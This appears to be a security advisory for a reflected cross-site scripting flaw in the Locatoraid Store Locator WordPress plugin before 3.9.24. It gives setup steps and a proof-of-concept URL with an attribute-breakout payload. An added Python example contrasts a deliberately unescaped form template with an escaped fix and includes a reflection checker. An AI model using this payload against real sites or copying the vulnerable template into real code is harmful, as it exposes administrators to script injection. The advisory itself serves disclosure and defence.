Locatoraid Store Locator < 3.9.24 - Reflected XSS

Description

The plugin does not sanitise and escape the lpr-search request parameter before outputting it back into the page, leading to a Reflected Cross-Site Scripting vulnerability. Because the payload is delivered by URL, it can be used against high-privilege users such as administrators who are tricked into opening the crafted link.

Proof of Concept

Setup (as admin):
- Locatoraid > Configuration > Google Maps > Enter "none" at Google Maps Browser API Key and Save
- Locatoraid > Publish > Add New (Pages with block) > Insert Shortcode [locatoraid] and Publish
- Go to Appearance > Widgets > Add block Locatoraid Search Form to Footer Area

Attack (as unauthenticated):
Open or make a logged in user open the following URL: http://example.com/?lpr-search="onfocus=alert(/XSS/) autofocus "
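The payload above only works if the parameter is written straight into an HTML attribute: the leading quote closes `value="`, `onfocus=... autofocus` becomes a new attribute that fires on page load, and the trailing quote keeps the tag well-formed. The following is an added example and not code from the advisory or from the Locatoraid plugin. It models that bug in a minimal search-form template, shows the same template with attribute escaping (the equivalent of WordPress's `esc_attr()`), builds the percent-encoded form of the PoC URL that a browser actually sends, and includes a small check for whether a response reflected the payload unescaped. The input markup, the function names and the checker are assumptions for illustration, not the plugin's real code.

```python
"""
Added example: models the lpr-search reflection and its fix.
Assumptions (not from the plugin source): the parameter lands in the
value="" attribute of the search form's <input>, and the fix is
attribute escaping equivalent to WordPress's esc_attr().
"""
from html import escape
from urllib.parse import parse_qs, urlencode, urlparse

# Payload as given in the advisory's PoC URL.
POC_PAYLOAD = '"onfocus=alert(/XSS/) autofocus "'


def poc_url(base: str = "http://example.com/") -> str:
    """Build the PoC URL with the payload percent-encoded, as a browser sends it."""
    return base + "?" + urlencode({"lpr-search": POC_PAYLOAD})


def search_term_from_url(url: str) -> str:
    """Server side: read the decoded lpr-search value from the query string ('' if absent)."""
    return parse_qs(urlparse(url).query).get("lpr-search", [""])[0]


def render_form_vulnerable(term: str) -> str:
    """Reflects the parameter into an attribute without escaping (the reported bug).

    With POC_PAYLOAD this yields value=""onfocus=alert(/XSS/) autofocus "">,
    i.e. an extra onfocus attribute that autofocus triggers on load.
    """
    return f'<input type="text" name="lpr-search" value="{term}">'


def render_form_fixed(term: str) -> str:
    """Escapes &, <, >, " and ' for an attribute context before output.

    The attacker's quotes become &quot;, so the value stays inside the
    attribute and no new attribute is created.
    """
    return f'<input type="text" name="lpr-search" value="{escape(term, quote=True)}">'


def reflected_unescaped(html: str, marker: str = "onfocus=alert(/XSS/)") -> bool:
    """Verification check for a response body: the injection only works if the
    quote immediately before the marker survived unescaped. An escaped
    response contains &quot;onfocus=..., which does not match."""
    return f'"{marker}' in html


if __name__ == "__main__":
    url = poc_url()
    term = search_term_from_url(url)
    print(url)
    print("vulnerable:", render_form_vulnerable(term), reflected_unescaped(render_form_vulnerable(term)))
    print("fixed:     ", render_form_fixed(term), reflected_unescaped(render_form_fixed(term)))
```

The checker is deliberately narrow: it looks for the attribute-breakout signature rather than the string `alert`, so a site that echoes the term escaped (which still contains the literal text) is correctly reported as not vulnerable.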

Affects Plugins

Fixed in 3.9.24

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
Dao Xuan Hieu
Submitter
Dao Xuan Hieu
Verified
Yes

Timeline

Publicly Published
2023-08-28
Added
2023-08-30
Last Updated
2023-08-30
